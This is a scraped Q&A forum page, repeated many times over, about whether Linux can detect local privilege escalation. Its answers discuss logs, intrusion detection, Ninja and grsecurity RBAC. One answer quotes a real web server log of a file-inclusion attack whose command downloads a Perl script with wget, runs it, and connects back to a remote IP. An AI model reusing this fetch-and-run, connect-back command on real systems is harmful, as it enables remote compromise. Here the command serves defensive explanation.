Privilege escalation detection?
Clash Royale CLAN TAG#URR8PPP
.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty margin-bottom:0;
Everytime when I read about some local privilege escalation exploit (e.g. this).
I wonder if an OS can detect that there is someone logging in as root (or new root process starting)? Imagine a Gnu/Linux machine prepared with a configuration that,
if root logs into it (or detects some exploit to gain root privileges) the machine will interrupt/shutdown itself and a backup machine (with different configuration) will start or an admin will be notified...
Does my idea makes sense, or are most of the exploits undetectable due their nature?
linux security root
add a comment |
Everytime when I read about some local privilege escalation exploit (e.g. this).
I wonder if an OS can detect that there is someone logging in as root (or new root process starting)? Imagine a Gnu/Linux machine prepared with a configuration that,
if root logs into it (or detects some exploit to gain root privileges) the machine will interrupt/shutdown itself and a backup machine (with different configuration) will start or an admin will be notified...
Does my idea makes sense, or are most of the exploits undetectable due their nature?
linux security root
A machine can detect when root logs in thanks topam
(the authentication module). Have a look at/var/log/auth.log
for example.
– lgeorget
May 23 '13 at 4:04
add a comment |
Everytime when I read about some local privilege escalation exploit (e.g. this).
I wonder if an OS can detect that there is someone logging in as root (or new root process starting)? Imagine a Gnu/Linux machine prepared with a configuration that,
if root logs into it (or detects some exploit to gain root privileges) the machine will interrupt/shutdown itself and a backup machine (with different configuration) will start or an admin will be notified...
Does my idea makes sense, or are most of the exploits undetectable due their nature?
linux security root
Everytime when I read about some local privilege escalation exploit (e.g. this).
I wonder if an OS can detect that there is someone logging in as root (or new root process starting)? Imagine a Gnu/Linux machine prepared with a configuration that,
if root logs into it (or detects some exploit to gain root privileges) the machine will interrupt/shutdown itself and a backup machine (with different configuration) will start or an admin will be notified...
Does my idea makes sense, or are most of the exploits undetectable due their nature?
linux security root
linux security root
edited Apr 7 at 10:40
ctrl-alt-delor
12.5k52662
12.5k52662
asked May 23 '13 at 3:19
Martin V.Martin V.
2551412
2551412
A machine can detect when root logs in thanks topam
(the authentication module). Have a look at/var/log/auth.log
for example.
– lgeorget
May 23 '13 at 4:04
add a comment |
A machine can detect when root logs in thanks topam
(the authentication module). Have a look at/var/log/auth.log
for example.
– lgeorget
May 23 '13 at 4:04
A machine can detect when root logs in thanks to
pam
(the authentication module). Have a look at /var/log/auth.log
for example.– lgeorget
May 23 '13 at 4:04
A machine can detect when root logs in thanks to
pam
(the authentication module). Have a look at /var/log/auth.log
for example.– lgeorget
May 23 '13 at 4:04
add a comment |
3 Answers
3
active
oldest
votes
Exploits by their very nature are trying to not be detected. So most exploits are not coming into the system through normal means, at least not initially. They'll typically use something like a buffer overflow to gain access to the system.
buffer overflow
This style of attack looks for portions of an application that are looking to take input from a user. Think about a web page and the various text boxes where you have to provide information by typing things into these text boxes. Each of these text boxes is a potential entry point for a would-be attacker.
The good news:
- most of these attacks are not gaining root access, they're gaining access to a user account specifically setup for the web server, so it typically has limited access to only web server files and functions.
- in breaking in the attacker has left a considerable trail in a number of areas.
- The firewall logs
- Webserver logs
- Other potential security tool logs
The bad news:
- They've gained access to a system, and so have a beachhead where they can continue trying to break in further.
- The logs. Yes most of the time break-ins are not detected for weeks/months/years given that analyzing logs is both time consuming and error prone.
detecting root logins
Most systems are designed to not allow root logins so this attack vector isn't really an issue. Most attacks gain access to some other lower level account and then leverage up by finding additional vulnerabilities once they've established a beachhead on your system.
example #1:
A would be attacker could gain root access by doing the following:
- Break into a system's web server account by finding a vulnerable web page that processes a user's input from some form through text boxes.
- Once access to the web server account has been achieved, attempt to either gain shell access through the web server's account or attempt to get the web server account to run commands on your behalf.
- Determine that there's a weakness in this particular system's version of a tool such as the command
ls
. - Overflow the tool
ls
to gain access to the root account.
example #2:
A would be attacker might not even be interested in gaining full control of your system. Most break-ins are only interested in collecting systems to be used as "slaves" for other uses. So often the attacker is only interested in getting their software installed on your system so that they can use the system, without ever even gaining full control of the system.
- Determine that a certain web site has made available webapp X. Attacker knows that webapp X has a vulnerability where webapp X allows users to upload image files.
- Attacker prepares a file called
CMD.gif
and uploads it. Maybe it's a user's avatar image on a forum site, for example. ButCMD.gif
isn't a image, it's actually a program, who's namedCMD.gif
. - Attacker uploads "image" to the forum site.
- Now attacker "tricks" webapp X into running his "image".
- Attacker makes calls with his browser to webapp X, but he calls it in ways the authors of webapp X never imagined. Nor did they design webapp X to disallow it.
web server log file of such an attack
201-67-28-XXX.bsace703.dsl.brasiltelecom.net.br - - [16/Sep/2006:15:18:53 -0300]
"GET /cursosuperior/index.php?page=http://parit.org/CMD.gif?
&cmd=cd%20/tmp;wget%20http://72.36.254.26/~fanta/dc.txt;perl%20dc.txt
%2072.36.21.183%2021 HTTP/1.1" 200
NOTE: sample log from an Apache web server courtesy OSSEC.net.
Here the attacker is getting webapp X (index.php) to run CMD.gif
which can then do the following:
cd /tmp
wget http://72.36.254.26/~fanta/dc.txt
perl dc.txt 72.36.21.183 21
So they've coaxed webapp X into changing directories to /tmp
, download a file, dc.txt
, and then run the file making a connection back to IP address 72.36.21.183 on port 21.
Disabling a "compromised" server
The idea that you can shut a server down that has "detected" an exploit is a good attempt, but it doesn't work for a couple of reasons.
- If the attacker can get into the first system, then they can probably get into the second system.
- Most systems are essentially clones of each other. They're easier to maintain, and keeping things simple (the same) is a hallmark of most things in IT and computers.
- Different configurations means more work in maintaining the systems and more opportunities to make mistakes, which is usually what leads to a vulnerability to begin with.
- The attackers goal might not be to break in, they might be trying to deny access to your service. This is called a denial of service (DoS).
Attempting to limit damage
I could go on and on but in general you have a few resources available when it comes to securing a system.
- Use tools such as tripwire to detect changes on a system's file system.
- Firewalls - limit access so that it's only explicitly allowed where needed, rather then having full access to everything.
- Analyze log files using tools to detect anomalies.
- Keep systems current and up to date with patches.
- Limit exposure - only install software that's needed on a system - if it doesn't need the
gcc
compiler installed, don't install it. - IDS - intrusion detection software.
add a comment |
The OS can and does add a log entry every time someone logs in as root. But that doesn't do any good against privilege escalation bugs for many reasons.
Once the attacker is root, they can delete log entries. The only way to avoid this is to write the logs to some place the attacker cannot access, such as a write-once media or a remote machine.
Logins or processes started as root are a normal event. You don't want to be waken up everyday at 6am because the daily cron jobs are running. Detecting suspicious processes, network traffic and other behavior is a complex job based on heuristics; a tool doing this job is called an IDS (intrusion detection system).
A privilege escalation bug doesn't involve the attacker logging in, nor even necessarily executing new processes. The attacker exploits a bug in a running program and makes it execute whatever code he injects. While it is often convenient for the attacker to call other programs that are already present on the system, it is rarely necessary.
add a comment |
A good question!
On multi user systems you just need some safeguards should a local root exploit succeed.
The Ninja userland software constantly monitors for new root processes and possibly kills them if they are spawned from unexpected sources. A minus is that Ninja takes quite a bit of CPU and still a custom exploit might just be fast enough to kill the Ninja before the Ninja kills it.
Ninja is a privilege escalation detection and prevention system for GNU/Linux hosts. While running, it will monitor process activity on the local host, and keep track of all processes running as root. If a process is spawned with UID or GID zero (root), ninja will log necessary information about this process, and optionally kill the process if it was spawned by an unauthorized user.
A safer alternative is to use a GRSEC patched kernel and it's RBAC (Role Based Access Control) features. With RBAC it is possible to strip the root user from all power so that gaining root is practically useless unless you also authenticate as admin role with gradm -a admin
.
GRSEC also comes with PaX, which makes the kernel a lot more difficult to exploit.
Again naive question : Wouldn't be great to integrate Ninja into kernel in such way that it would not be stopped ?
– Martin V.
Jun 19 '13 at 2:32
@MartinV. You can consider Ninja a workaround if you are unable to use GRSEC kernel and RBAC. With RBAC, kernel can kill unauthorized sessions and processes.
– jkj
Jun 19 '13 at 19:23
add a comment |
Your Answer
StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "106"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);
StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);
else
createEditor();
);
function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);
);
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f76766%2fprivilege-escalation-detection%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
3 Answers
3
active
oldest
votes
3 Answers
3
active
oldest
votes
active
oldest
votes
active
oldest
votes
Exploits by their very nature are trying to not be detected. So most exploits are not coming into the system through normal means, at least not initially. They'll typically use something like a buffer overflow to gain access to the system.
buffer overflow
This style of attack looks for portions of an application that are looking to take input from a user. Think about a web page and the various text boxes where you have to provide information by typing things into these text boxes. Each of these text boxes is a potential entry point for a would-be attacker.
The good news:
- most of these attacks are not gaining root access, they're gaining access to a user account specifically setup for the web server, so it typically has limited access to only web server files and functions.
- in breaking in the attacker has left a considerable trail in a number of areas.
- The firewall logs
- Webserver logs
- Other potential security tool logs
The bad news:
- They've gained access to a system, and so have a beachhead where they can continue trying to break in further.
- The logs. Yes most of the time break-ins are not detected for weeks/months/years given that analyzing logs is both time consuming and error prone.
detecting root logins
Most systems are designed to not allow root logins so this attack vector isn't really an issue. Most attacks gain access to some other lower level account and then leverage up by finding additional vulnerabilities once they've established a beachhead on your system.
example #1:
A would be attacker could gain root access by doing the following:
- Break into a system's web server account by finding a vulnerable web page that processes a user's input from some form through text boxes.
- Once access to the web server account has been achieved, attempt to either gain shell access through the web server's account or attempt to get the web server account to run commands on your behalf.
- Determine that there's a weakness in this particular system's version of a tool such as the command
ls
. - Overflow the tool
ls
to gain access to the root account.
example #2:
A would be attacker might not even be interested in gaining full control of your system. Most break-ins are only interested in collecting systems to be used as "slaves" for other uses. So often the attacker is only interested in getting their software installed on your system so that they can use the system, without ever even gaining full control of the system.
- Determine that a certain web site has made available webapp X. Attacker knows that webapp X has a vulnerability where webapp X allows users to upload image files.
- Attacker prepares a file called
CMD.gif
and uploads it. Maybe it's a user's avatar image on a forum site, for example. ButCMD.gif
isn't a image, it's actually a program, who's namedCMD.gif
. - Attacker uploads "image" to the forum site.
- Now attacker "tricks" webapp X into running his "image".
- Attacker makes calls with his browser to webapp X, but he calls it in ways the authors of webapp X never imagined. Nor did they design webapp X to disallow it.
web server log file of such an attack
201-67-28-XXX.bsace703.dsl.brasiltelecom.net.br - - [16/Sep/2006:15:18:53 -0300]
"GET /cursosuperior/index.php?page=http://parit.org/CMD.gif?
&cmd=cd%20/tmp;wget%20http://72.36.254.26/~fanta/dc.txt;perl%20dc.txt
%2072.36.21.183%2021 HTTP/1.1" 200
NOTE: sample log from an Apache web server courtesy OSSEC.net.
Here the attacker is getting webapp X (index.php) to run CMD.gif
which can then do the following:
cd /tmp
wget http://72.36.254.26/~fanta/dc.txt
perl dc.txt 72.36.21.183 21
So they've coaxed webapp X into changing directories to /tmp
, download a file, dc.txt
, and then run the file making a connection back to IP address 72.36.21.183 on port 21.
Disabling a "compromised" server
The idea that you can shut a server down that has "detected" an exploit is a good attempt, but it doesn't work for a couple of reasons.
- If the attacker can get into the first system, then they can probably get into the second system.
- Most systems are essentially clones of each other. They're easier to maintain, and keeping things simple (the same) is a hallmark of most things in IT and computers.
- Different configurations means more work in maintaining the systems and more opportunities to make mistakes, which is usually what leads to a vulnerability to begin with.
- The attackers goal might not be to break in, they might be trying to deny access to your service. This is called a denial of service (DoS).
Attempting to limit damage
I could go on and on but in general you have a few resources available when it comes to securing a system.
- Use tools such as tripwire to detect changes on a system's file system.
- Firewalls - limit access so that it's only explicitly allowed where needed, rather then having full access to everything.
- Analyze log files using tools to detect anomalies.
- Keep systems current and up to date with patches.
- Limit exposure - only install software that's needed on a system - if it doesn't need the
gcc
compiler installed, don't install it. - IDS - intrusion detection software.
add a comment |
Exploits by their very nature are trying to not be detected. So most exploits are not coming into the system through normal means, at least not initially. They'll typically use something like a buffer overflow to gain access to the system.
buffer overflow
This style of attack looks for portions of an application that are looking to take input from a user. Think about a web page and the various text boxes where you have to provide information by typing things into these text boxes. Each of these text boxes is a potential entry point for a would-be attacker.
The good news:
- most of these attacks are not gaining root access, they're gaining access to a user account specifically setup for the web server, so it typically has limited access to only web server files and functions.
- in breaking in the attacker has left a considerable trail in a number of areas.
- The firewall logs
- Webserver logs
- Other potential security tool logs
The bad news:
- They've gained access to a system, and so have a beachhead where they can continue trying to break in further.
- The logs. Yes most of the time break-ins are not detected for weeks/months/years given that analyzing logs is both time consuming and error prone.
detecting root logins
Most systems are designed to not allow root logins so this attack vector isn't really an issue. Most attacks gain access to some other lower level account and then leverage up by finding additional vulnerabilities once they've established a beachhead on your system.
example #1:
A would be attacker could gain root access by doing the following:
- Break into a system's web server account by finding a vulnerable web page that processes a user's input from some form through text boxes.
- Once access to the web server account has been achieved, attempt to either gain shell access through the web server's account or attempt to get the web server account to run commands on your behalf.
- Determine that there's a weakness in this particular system's version of a tool such as the command
ls
. - Overflow the tool
ls
to gain access to the root account.
example #2:
A would be attacker might not even be interested in gaining full control of your system. Most break-ins are only interested in collecting systems to be used as "slaves" for other uses. So often the attacker is only interested in getting their software installed on your system so that they can use the system, without ever even gaining full control of the system.
- Determine that a certain web site has made available webapp X. Attacker knows that webapp X has a vulnerability where webapp X allows users to upload image files.
- Attacker prepares a file called
CMD.gif
and uploads it. Maybe it's a user's avatar image on a forum site, for example. ButCMD.gif
isn't a image, it's actually a program, who's namedCMD.gif
. - Attacker uploads "image" to the forum site.
- Now attacker "tricks" webapp X into running his "image".
- Attacker makes calls with his browser to webapp X, but he calls it in ways the authors of webapp X never imagined. Nor did they design webapp X to disallow it.
web server log file of such an attack
201-67-28-XXX.bsace703.dsl.brasiltelecom.net.br - - [16/Sep/2006:15:18:53 -0300]
"GET /cursosuperior/index.php?page=http://parit.org/CMD.gif?
&cmd=cd%20/tmp;wget%20http://72.36.254.26/~fanta/dc.txt;perl%20dc.txt
%2072.36.21.183%2021 HTTP/1.1" 200
NOTE: sample log from an Apache web server courtesy OSSEC.net.
Here the attacker is getting webapp X (index.php) to run CMD.gif
which can then do the following:
cd /tmp
wget http://72.36.254.26/~fanta/dc.txt
perl dc.txt 72.36.21.183 21
So they've coaxed webapp X into changing directories to /tmp
, download a file, dc.txt
, and then run the file making a connection back to IP address 72.36.21.183 on port 21.
Disabling a "compromised" server
The idea that you can shut a server down that has "detected" an exploit is a good attempt, but it doesn't work for a couple of reasons.
- If the attacker can get into the first system, then they can probably get into the second system.
- Most systems are essentially clones of each other. They're easier to maintain, and keeping things simple (the same) is a hallmark of most things in IT and computers.
- Different configurations means more work in maintaining the systems and more opportunities to make mistakes, which is usually what leads to a vulnerability to begin with.
- The attackers goal might not be to break in, they might be trying to deny access to your service. This is called a denial of service (DoS).
Attempting to limit damage
I could go on and on but in general you have a few resources available when it comes to securing a system.
- Use tools such as tripwire to detect changes on a system's file system.
- Firewalls - limit access so that it's only explicitly allowed where needed, rather then having full access to everything.
- Analyze log files using tools to detect anomalies.
- Keep systems current and up to date with patches.
- Limit exposure - only install software that's needed on a system - if it doesn't need the
gcc
compiler installed, don't install it. - IDS - intrusion detection software.
add a comment |
Exploits by their very nature are trying to not be detected. So most exploits are not coming into the system through normal means, at least not initially. They'll typically use something like a buffer overflow to gain access to the system.
buffer overflow
This style of attack looks for portions of an application that are looking to take input from a user. Think about a web page and the various text boxes where you have to provide information by typing things into these text boxes. Each of these text boxes is a potential entry point for a would-be attacker.
The good news:
- most of these attacks are not gaining root access, they're gaining access to a user account specifically setup for the web server, so it typically has limited access to only web server files and functions.
- in breaking in the attacker has left a considerable trail in a number of areas.
- The firewall logs
- Webserver logs
- Other potential security tool logs
The bad news:
- They've gained access to a system, and so have a beachhead where they can continue trying to break in further.
- The logs. Yes most of the time break-ins are not detected for weeks/months/years given that analyzing logs is both time consuming and error prone.
detecting root logins
Most systems are designed to not allow root logins so this attack vector isn't really an issue. Most attacks gain access to some other lower level account and then leverage up by finding additional vulnerabilities once they've established a beachhead on your system.
example #1:
A would be attacker could gain root access by doing the following:
- Break into a system's web server account by finding a vulnerable web page that processes a user's input from some form through text boxes.
- Once access to the web server account has been achieved, attempt to either gain shell access through the web server's account or attempt to get the web server account to run commands on your behalf.
- Determine that there's a weakness in this particular system's version of a tool such as the command
ls
. - Overflow the tool
ls
to gain access to the root account.
example #2:
A would be attacker might not even be interested in gaining full control of your system. Most break-ins are only interested in collecting systems to be used as "slaves" for other uses. So often the attacker is only interested in getting their software installed on your system so that they can use the system, without ever even gaining full control of the system.
- Determine that a certain web site has made available webapp X. Attacker knows that webapp X has a vulnerability where webapp X allows users to upload image files.
- Attacker prepares a file called
CMD.gif
and uploads it. Maybe it's a user's avatar image on a forum site, for example. ButCMD.gif
isn't a image, it's actually a program, who's namedCMD.gif
. - Attacker uploads "image" to the forum site.
- Now attacker "tricks" webapp X into running his "image".
- Attacker makes calls with his browser to webapp X, but he calls it in ways the authors of webapp X never imagined. Nor did they design webapp X to disallow it.
web server log file of such an attack
201-67-28-XXX.bsace703.dsl.brasiltelecom.net.br - - [16/Sep/2006:15:18:53 -0300]
"GET /cursosuperior/index.php?page=http://parit.org/CMD.gif?
&cmd=cd%20/tmp;wget%20http://72.36.254.26/~fanta/dc.txt;perl%20dc.txt
%2072.36.21.183%2021 HTTP/1.1" 200
NOTE: sample log from an Apache web server courtesy OSSEC.net.
Here the attacker is getting webapp X (index.php) to run CMD.gif
which can then do the following:
cd /tmp
wget http://72.36.254.26/~fanta/dc.txt
perl dc.txt 72.36.21.183 21
So they've coaxed webapp X into changing directories to /tmp
, download a file, dc.txt
, and then run the file making a connection back to IP address 72.36.21.183 on port 21.
Disabling a "compromised" server
The idea that you can shut a server down that has "detected" an exploit is a good attempt, but it doesn't work for a couple of reasons.
- If the attacker can get into the first system, then they can probably get into the second system.
- Most systems are essentially clones of each other. They're easier to maintain, and keeping things simple (the same) is a hallmark of most things in IT and computers.
- Different configurations means more work in maintaining the systems and more opportunities to make mistakes, which is usually what leads to a vulnerability to begin with.
- The attackers goal might not be to break in, they might be trying to deny access to your service. This is called a denial of service (DoS).
Attempting to limit damage
I could go on and on but in general you have a few resources available when it comes to securing a system.
- Use tools such as tripwire to detect changes on a system's file system.
- Firewalls - limit access so that it's only explicitly allowed where needed, rather then having full access to everything.
- Analyze log files using tools to detect anomalies.
- Keep systems current and up to date with patches.
- Limit exposure - only install software that's needed on a system - if it doesn't need the
gcc
compiler installed, don't install it. - IDS - intrusion detection software.
Exploits by their very nature are trying to not be detected. So most exploits are not coming into the system through normal means, at least not initially. They'll typically use something like a buffer overflow to gain access to the system.
buffer overflow
This style of attack looks for portions of an application that are looking to take input from a user. Think about a web page and the various text boxes where you have to provide information by typing things into these text boxes. Each of these text boxes is a potential entry point for a would-be attacker.
The good news:
- most of these attacks are not gaining root access, they're gaining access to a user account specifically setup for the web server, so it typically has limited access to only web server files and functions.
- in breaking in the attacker has left a considerable trail in a number of areas.
- The firewall logs
- Webserver logs
- Other potential security tool logs
The bad news:
- They've gained access to a system, and so have a beachhead where they can continue trying to break in further.
- The logs. Yes most of the time break-ins are not detected for weeks/months/years given that analyzing logs is both time consuming and error prone.
detecting root logins
Most systems are designed to not allow root logins so this attack vector isn't really an issue. Most attacks gain access to some other lower level account and then leverage up by finding additional vulnerabilities once they've established a beachhead on your system.
example #1:
A would be attacker could gain root access by doing the following:
- Break into a system's web server account by finding a vulnerable web page that processes a user's input from some form through text boxes.
- Once access to the web server account has been achieved, attempt to either gain shell access through the web server's account or attempt to get the web server account to run commands on your behalf.
- Determine that there's a weakness in this particular system's version of a tool such as the command
ls
. - Overflow the tool
ls
to gain access to the root account.
example #2:
A would be attacker might not even be interested in gaining full control of your system. Most break-ins are only interested in collecting systems to be used as "slaves" for other uses. So often the attacker is only interested in getting their software installed on your system so that they can use the system, without ever even gaining full control of the system.
- Determine that a certain web site has made available webapp X. Attacker knows that webapp X has a vulnerability where webapp X allows users to upload image files.
- Attacker prepares a file called
CMD.gif
and uploads it. Maybe it's a user's avatar image on a forum site, for example. ButCMD.gif
isn't a image, it's actually a program, who's namedCMD.gif
. - Attacker uploads "image" to the forum site.
- Now attacker "tricks" webapp X into running his "image".
- Attacker makes calls with his browser to webapp X, but he calls it in ways the authors of webapp X never imagined. Nor did they design webapp X to disallow it.
web server log file of such an attack
201-67-28-XXX.bsace703.dsl.brasiltelecom.net.br - - [16/Sep/2006:15:18:53 -0300]
"GET /cursosuperior/index.php?page=http://parit.org/CMD.gif?
&cmd=cd%20/tmp;wget%20http://72.36.254.26/~fanta/dc.txt;perl%20dc.txt
%2072.36.21.183%2021 HTTP/1.1" 200
NOTE: sample log from an Apache web server courtesy OSSEC.net.
Here the attacker is getting webapp X (index.php) to run CMD.gif
which can then do the following:
cd /tmp
wget http://72.36.254.26/~fanta/dc.txt
perl dc.txt 72.36.21.183 21
So they've coaxed webapp X into changing directories to /tmp
, download a file, dc.txt
, and then run the file making a connection back to IP address 72.36.21.183 on port 21.
Disabling a "compromised" server
The idea that you can shut a server down that has "detected" an exploit is a good attempt, but it doesn't work for a couple of reasons.
- If the attacker can get into the first system, then they can probably get into the second system.
- Most systems are essentially clones of each other. They're easier to maintain, and keeping things simple (the same) is a hallmark of most things in IT and computers.
- Different configurations means more work in maintaining the systems and more opportunities to make mistakes, which is usually what leads to a vulnerability to begin with.
- The attackers goal might not be to break in, they might be trying to deny access to your service. This is called a denial of service (DoS).
Attempting to limit damage
I could go on and on but in general you have a few resources available when it comes to securing a system.
- Use tools such as tripwire to detect changes on a system's file system.
- Firewalls - limit access so that it's only explicitly allowed where needed, rather then having full access to everything.
- Analyze log files using tools to detect anomalies.
- Keep systems current and up to date with patches.
- Limit exposure - only install software that's needed on a system - if it doesn't need the
gcc
compiler installed, don't install it. - IDS - intrusion detection software.
answered May 23 '13 at 9:06
slm♦slm
256k71544690
256k71544690
add a comment |
add a comment |
The OS can and does add a log entry every time someone logs in as root. But that doesn't do any good against privilege escalation bugs for many reasons.
Once the attacker is root, they can delete log entries. The only way to avoid this is to write the logs to some place the attacker cannot access, such as a write-once media or a remote machine.
Logins or processes started as root are a normal event. You don't want to be waken up everyday at 6am because the daily cron jobs are running. Detecting suspicious processes, network traffic and other behavior is a complex job based on heuristics; a tool doing this job is called an IDS (intrusion detection system).
A privilege escalation bug doesn't involve the attacker logging in, nor even necessarily executing new processes. The attacker exploits a bug in a running program and makes it execute whatever code he injects. While it is often convenient for the attacker to call other programs that are already present on the system, it is rarely necessary.
add a comment |
The OS can and does add a log entry every time someone logs in as root. But that doesn't do any good against privilege escalation bugs for many reasons.
Once the attacker is root, they can delete log entries. The only way to avoid this is to write the logs to some place the attacker cannot access, such as a write-once media or a remote machine.
Logins or processes started as root are a normal event. You don't want to be waken up everyday at 6am because the daily cron jobs are running. Detecting suspicious processes, network traffic and other behavior is a complex job based on heuristics; a tool doing this job is called an IDS (intrusion detection system).
A privilege escalation bug doesn't involve the attacker logging in, nor even necessarily executing new processes. The attacker exploits a bug in a running program and makes it execute whatever code he injects. While it is often convenient for the attacker to call other programs that are already present on the system, it is rarely necessary.
add a comment |
The OS can and does add a log entry every time someone logs in as root. But that doesn't do any good against privilege escalation bugs for many reasons.
Once the attacker is root, they can delete log entries. The only way to avoid this is to write the logs to some place the attacker cannot access, such as a write-once media or a remote machine.
Logins or processes started as root are a normal event. You don't want to be waken up everyday at 6am because the daily cron jobs are running. Detecting suspicious processes, network traffic and other behavior is a complex job based on heuristics; a tool doing this job is called an IDS (intrusion detection system).
A privilege escalation bug doesn't involve the attacker logging in, nor even necessarily executing new processes. The attacker exploits a bug in a running program and makes it execute whatever code he injects. While it is often convenient for the attacker to call other programs that are already present on the system, it is rarely necessary.
The OS can and does add a log entry every time someone logs in as root. But that doesn't do any good against privilege escalation bugs for many reasons.
Once the attacker is root, they can delete log entries. The only way to avoid this is to write the logs to some place the attacker cannot access, such as a write-once media or a remote machine.
Logins or processes started as root are a normal event. You don't want to be waken up everyday at 6am because the daily cron jobs are running. Detecting suspicious processes, network traffic and other behavior is a complex job based on heuristics; a tool doing this job is called an IDS (intrusion detection system).
A privilege escalation bug doesn't involve the attacker logging in, nor even necessarily executing new processes. The attacker exploits a bug in a running program and makes it execute whatever code he injects. While it is often convenient for the attacker to call other programs that are already present on the system, it is rarely necessary.
answered May 25 '13 at 23:48
GillesGilles
548k13011131631
548k13011131631
add a comment |
add a comment |
A good question!
On multi user systems you just need some safeguards should a local root exploit succeed.
The Ninja userland software constantly monitors for new root processes and possibly kills them if they are spawned from unexpected sources. A minus is that Ninja takes quite a bit of CPU and still a custom exploit might just be fast enough to kill the Ninja before the Ninja kills it.
Ninja is a privilege escalation detection and prevention system for GNU/Linux hosts. While running, it will monitor process activity on the local host, and keep track of all processes running as root. If a process is spawned with UID or GID zero (root), ninja will log necessary information about this process, and optionally kill the process if it was spawned by an unauthorized user.
A safer alternative is to use a GRSEC patched kernel and it's RBAC (Role Based Access Control) features. With RBAC it is possible to strip the root user from all power so that gaining root is practically useless unless you also authenticate as admin role with gradm -a admin
.
GRSEC also comes with PaX, which makes the kernel a lot more difficult to exploit.
Again naive question : Wouldn't be great to integrate Ninja into kernel in such way that it would not be stopped ?
– Martin V.
Jun 19 '13 at 2:32
@MartinV. You can consider Ninja a workaround if you are unable to use GRSEC kernel and RBAC. With RBAC, kernel can kill unauthorized sessions and processes.
– jkj
Jun 19 '13 at 19:23
add a comment |
A good question!
On multi user systems you just need some safeguards should a local root exploit succeed.
The Ninja userland software constantly monitors for new root processes and possibly kills them if they are spawned from unexpected sources. A minus is that Ninja takes quite a bit of CPU and still a custom exploit might just be fast enough to kill the Ninja before the Ninja kills it.
Ninja is a privilege escalation detection and prevention system for GNU/Linux hosts. While running, it will monitor process activity on the local host, and keep track of all processes running as root. If a process is spawned with UID or GID zero (root), ninja will log necessary information about this process, and optionally kill the process if it was spawned by an unauthorized user.
A safer alternative is to use a GRSEC patched kernel and it's RBAC (Role Based Access Control) features. With RBAC it is possible to strip the root user from all power so that gaining root is practically useless unless you also authenticate as admin role with gradm -a admin
.
GRSEC also comes with PaX, which makes the kernel a lot more difficult to exploit.
Again naive question : Wouldn't be great to integrate Ninja into kernel in such way that it would not be stopped ?
– Martin V.
Jun 19 '13 at 2:32
@MartinV. You can consider Ninja a workaround if you are unable to use GRSEC kernel and RBAC. With RBAC, kernel can kill unauthorized sessions and processes.
– jkj
Jun 19 '13 at 19:23
add a comment |
A good question!
On multi user systems you just need some safeguards should a local root exploit succeed.
The Ninja userland software constantly monitors for new root processes and possibly kills them if they are spawned from unexpected sources. A minus is that Ninja takes quite a bit of CPU and still a custom exploit might just be fast enough to kill the Ninja before the Ninja kills it.
Ninja is a privilege escalation detection and prevention system for GNU/Linux hosts. While running, it will monitor process activity on the local host, and keep track of all processes running as root. If a process is spawned with UID or GID zero (root), ninja will log necessary information about this process, and optionally kill the process if it was spawned by an unauthorized user.
A safer alternative is to use a GRSEC patched kernel and it's RBAC (Role Based Access Control) features. With RBAC it is possible to strip the root user from all power so that gaining root is practically useless unless you also authenticate as admin role with gradm -a admin
.
GRSEC also comes with PaX, which makes the kernel a lot more difficult to exploit.
A good question!
On multi user systems you just need some safeguards should a local root exploit succeed.
The Ninja userland software constantly monitors for new root processes and possibly kills them if they are spawned from unexpected sources. A minus is that Ninja takes quite a bit of CPU and still a custom exploit might just be fast enough to kill the Ninja before the Ninja kills it.
Ninja is a privilege escalation detection and prevention system for GNU/Linux hosts. While running, it will monitor process activity on the local host, and keep track of all processes running as root. If a process is spawned with UID or GID zero (root), ninja will log necessary information about this process, and optionally kill the process if it was spawned by an unauthorized user.
A safer alternative is to use a GRSEC patched kernel and it's RBAC (Role Based Access Control) features. With RBAC it is possible to strip the root user from all power so that gaining root is practically useless unless you also authenticate as admin role with gradm -a admin
.
GRSEC also comes with PaX, which makes the kernel a lot more difficult to exploit.
answered May 26 '13 at 1:17
jkjjkj
1514
1514
Again naive question : Wouldn't be great to integrate Ninja into kernel in such way that it would not be stopped ?
– Martin V.
Jun 19 '13 at 2:32
@MartinV. You can consider Ninja a workaround if you are unable to use GRSEC kernel and RBAC. With RBAC, kernel can kill unauthorized sessions and processes.
– jkj
Jun 19 '13 at 19:23
add a comment |
Again naive question : Wouldn't be great to integrate Ninja into kernel in such way that it would not be stopped ?
– Martin V.
Jun 19 '13 at 2:32
@MartinV. You can consider Ninja a workaround if you are unable to use GRSEC kernel and RBAC. With RBAC, kernel can kill unauthorized sessions and processes.
– jkj
Jun 19 '13 at 19:23
Again naive question : Wouldn't be great to integrate Ninja into kernel in such way that it would not be stopped ?
– Martin V.
Jun 19 '13 at 2:32
Again naive question : Wouldn't be great to integrate Ninja into kernel in such way that it would not be stopped ?
– Martin V.
Jun 19 '13 at 2:32
@MartinV. You can consider Ninja a workaround if you are unable to use GRSEC kernel and RBAC. With RBAC, kernel can kill unauthorized sessions and processes.
– jkj
Jun 19 '13 at 19:23
@MartinV. You can consider Ninja a workaround if you are unable to use GRSEC kernel and RBAC. With RBAC, kernel can kill unauthorized sessions and processes.
– jkj
Jun 19 '13 at 19:23
add a comment |
Thanks for contributing an answer to Unix & Linux Stack Exchange!
